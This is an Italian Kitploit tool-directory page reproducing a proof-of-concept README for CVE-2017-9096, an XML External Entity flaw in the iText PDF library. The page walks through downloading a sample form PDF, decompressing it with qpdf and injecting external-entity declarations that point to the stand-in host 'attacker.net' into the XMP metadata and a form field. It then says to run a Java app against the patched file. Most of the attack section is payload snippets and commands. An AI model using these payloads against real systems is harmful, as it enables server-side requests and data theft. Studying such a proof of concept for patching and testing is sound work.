Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-9096-iText-XXE — Proof-of-concept exploit per CVE-2017-9096 che dimostra l'iniezione XML External Entity (XXE) nella libreria PDF iText tramite metadati XMP e campi modulo dannosi. | Kitploit
Strumenti/GitHubGitHub/jakabakos/cve-2017-9096-itext-xxe
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzingPenetration Testing
GitHubjakabakos/cve-2017-9096-itext-xxe

CVE-2017-9096-iText-XXE

Proof-of-concept exploit per CVE-2017-9096 che dimostra l'iniezione XML External Entity (XXE) nella libreria PDF iText tramite metadati XMP e campi modulo dannosi.

Vedi Repository
133454 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-9096

1. Creare il PDF malevolo contenente XXE

Ottieni un PDF contenente un modulo:

wget https://www.pdfscripting.com/public/FreeStuff/PDFSamples/ModifySubmit_Example.pdf -O input.pdf

Decomprimi il PDF

Per farlo, devi decomprimere il PDF con qpdf --qdf --object-streams=disable input.pdf output.pdf; poi puoi modificare il PDF con un editor di testo e aggiungere XML malevolo.

Aggiungi le entità esterne

Puoi inserire XEE nei metadati XMP alla riga 77:

stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [ <!ENTITY xxe2 SYSTEM "http://attacker.net" > ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.0-c321 44.398116, Tue Aug 04 2009 14:24:39">

E ovviamente inserisci anche il riferimento da qualche parte, ad esempio alla riga 88:

<xap:CreatorTool>Adobe LiveCycle Designer 8.0 &xxe2;</xap:CreatorTool>

Puoi anche aggiungere una XXE comune al file. Vedi questa parte nel documento originale (inizia alla riga 740):

stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Modificala come segue:

stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Quindi, aggiungi semplicemente il riferimento da qualche parte, ad esempio al campo City (riga 1845 nel documento decompresso originale). Cambia questo:

<text
>City:</text
></value
>

Con questo:

<text
>City:</text
><xxe>&xxe;</xxe></value
>

Trovi anche il PDF patchato contenente entrambe le XXE in questo repository (output_with_xxe.pdf).

2. Esegui l'attacco

Esegui l'app Java per testare il PDF con mvn clean compile exec:java.

Scarica lo strumento